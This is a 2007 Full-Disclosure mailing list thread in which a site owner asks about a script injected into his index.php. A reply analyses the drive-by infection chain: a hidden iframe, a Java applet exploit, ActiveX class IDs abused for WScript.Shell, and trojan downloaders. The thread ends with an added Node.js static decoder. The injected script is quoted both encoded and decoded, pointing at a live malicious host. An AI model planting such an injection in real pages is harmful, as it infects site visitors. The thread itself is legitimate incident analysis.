Full Disclosure mailing list archives

Re: any idea what is going on here?


From: Andrew Farmer <andfarm () gmail com>
Date: Thu, 4 Jan 2007 15:25:50 -0800

On 04 Jan 07, at 13:37, Ian Shaw wrote:
> A website that I am developing has had BackDoor-CUS!php uploaded to
> the images directory.  My fault entirely, due to the permissions set.
>
> This has resulted in
>
> <html>
> <script language="javascript">
> s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
> document.writeln(s);document.close();
> </script>
> </html>
>
> being added to the top of index.php.
>
> Unencoded this reads
>
> <iframe src="http://www.nownames.org/images/in.php?adv=3"
> WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0"
> SCROLLING="auto" frameborder="0" NORESIZE></iframe>
>
> When I go to this, an applet appears to run but I am not sure what it
> is doing.  I closed my browser out of fear.
>
> Does anyone know what it is attempting to do?

The iframe source loads an obfuscated Javascript which, when decoded,  
loads a Java applet and subsequently attempts several exploits.

I have disassembled the Java applet. It contains some obfuscation of  
its own, defining classes at runtime from inline byte arrays. It  
appears to exploit the Microsoft Java VM by overloading  
SecurityClassLoader at runtime.

One is against a number of ActiveX plugins which implement  
CreateObject or GetObject methods which may be used to create a  
WScript.Shell. The class IDs of the plugins in question are:

{BD96C556-65A3-11D0-983A-00C04FC29E36}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43c8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44f9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496b-B050-6C07C962476B}

If such a plugin is found, the script loads and runs a small Windows  
executable. I have not fully analyzed this executable, but it appears  
to be a downloader which is not identified by Kaspersky. It loads a  
third executable in MS-DOS format from another site. None of my tools  
can disassemble this, but Kaspersky identifies it as Trojan- 
Downloader.Win32.Small.avw: *another* loader.

Following this, the decrypted script contains part of another  
exploit. The exploit is truncated, so I'm not sure exactly what it's  
targeting. There's a lot of Unicode shellcode escaping going on, but  
the final "attack" is missing. This may be due to a bug in the  
decryption routine.

All files are available on request, if anyone's interested in doing  
some further analysis of their own.


That was fun :)
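The safe way to answer "what does this do?" for the injected block quoted above is to decode it statically rather than open it in a browser. The following is an added example (not code from either poster): a Node.js script that re-implements the legacy unescape() (both %XX and %uXXXX forms, the latter being what the "Unicode shellcode escaping" Andrew mentions relies on), pulls every unescape("...") literal out of a page source without evaluating any script, decodes it, and reports any iframe it finds together with its source host and whether it is zero-sized. The sample page embedded in it is constructed to mirror the posted injection (the percent-encoded payload joined back onto one line, the nownames.org URL as posted); the function names are this example's own.

```javascript
"use strict";

// Constructed sample: the injected <script> block as it appeared at the
// top of the compromised index.php, with the mail-wrapped literal rejoined.
const SAMPLE_INJECTION = `<html>
<script language="javascript">
s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
document.writeln(s);document.close();
</script>
</html>`;

// Re-implementation of the legacy JavaScript unescape(): %XX decodes to the
// Latin-1 code unit, %uXXXX to the UTF-16 code unit (the form shellcode
// loaders use); anything that is not a valid sequence passes through.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Pull every string literal passed to unescape() out of page source without
// running it. Line breaks inside a literal (mail or editor wrapping, as in
// the quoted post) are dropped together with the whitespace around them.
function extractUnescapeLiterals(page) {
  const re = /unescape\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  const literals = [];
  let m;
  while ((m = re.exec(page)) !== null) {
    literals.push(m[2].replace(/\s*\r?\n\s*/g, ""));
  }
  return literals;
}

// Parse the attributes of every <iframe ...> opening tag in decoded markup.
// Attribute names are lower-cased; valueless attributes (NORESIZE) map to "".
function parseIframes(markup) {
  const frames = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([^\s=\/"']+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let t;
  while ((t = tagRe.exec(markup)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(t[1])) !== null) {
      const val = a[2] !== undefined ? a[2]
        : a[3] !== undefined ? a[3]
        : a[4] !== undefined ? a[4] : "";
      attrs[a[1].toLowerCase()] = val;
    }
    frames.push(attrs);
  }
  return frames;
}

// A zero-sized frame is the tell: a legitimate embed has a visible size.
function isZeroSized(attrs) {
  const zero = (v) => v !== undefined && /^0+(%|px)?$/.test(v.trim());
  return zero(attrs.width) || zero(attrs.height);
}

// Full pipeline: page source in, one report entry per iframe found inside
// any unescape() literal, with the host the frame would load from.
function analyzeInjection(page) {
  const report = [];
  for (const literal of extractUnescapeLiterals(page)) {
    const decoded = legacyUnescape(literal);
    for (const attrs of parseIframes(decoded)) {
      let host = null;
      try { host = new URL(attrs.src).hostname; } catch (_) { /* relative or malformed src */ }
      report.push({ src: attrs.src, host, hidden: isZeroSized(attrs), decoded });
    }
  }
  return report;
}

for (const f of analyzeInjection(SAMPLE_INJECTION)) {
  console.log(`${f.hidden ? "HIDDEN" : "visible"} iframe -> ${f.src} (host: ${f.host})`);
}
```

Run it with `node decode_injection.js` against the sample, or replace SAMPLE_INJECTION with the contents of the compromised index.php; the host it prints is the one to block at the proxy and to hand to whoever is doing the second-stage analysis, and nothing from the page is ever executed.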

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
